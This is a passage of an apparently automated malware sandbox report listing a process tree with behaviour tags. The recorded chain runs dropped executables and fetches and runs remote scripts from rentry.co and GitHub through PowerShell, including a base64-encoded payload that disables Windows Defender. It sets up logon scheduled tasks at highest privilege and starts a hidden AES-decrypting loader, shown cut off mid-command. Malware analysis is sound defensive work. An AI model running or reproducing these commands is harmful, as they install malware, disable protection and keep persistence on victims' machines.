        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        13⤵
        
        PID:3400
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE59E.tmp.bat""
        13⤵
        
        PID:2892
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:2684
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        14⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5740
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        Executes dropped EXE
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        Executes dropped EXE
        
        PID:1560
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:2824
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:4280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        13⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:5440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        14⤵
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        15⤵
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        16⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        16⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:6076
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        13⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDE2C.tmp.bat""
        12⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        13⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1832
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:6280
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        Executes dropped EXE
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        Executes dropped EXE
        
        PID:5296
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        12⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:4520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        13⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        11⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        12⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCE4E.tmp.bat""
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:4024
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        12⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5860
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        Executes dropped EXE
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        9⤵
        Executes dropped EXE
        
        PID:5820
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3300
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        11⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:5680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        12⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:2108
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5356
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC71A.tmp.bat""
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1032
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        11⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4332
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        11⤵
        Executes dropped EXE
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        9⤵
        Executes dropped EXE
        
        PID:5888
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        8⤵
        Executes dropped EXE
        
        PID:5124
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        10⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:5220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        11⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        9⤵
        
        PID:5476
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        10⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBB23.tmp.bat""
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:6140
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:6116
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        10⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5156
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        10⤵
        Executes dropped EXE
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        8⤵
        Executes dropped EXE
        
        PID:5236
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        6⤵
        
        PID:248
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        
        PID:2816
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); 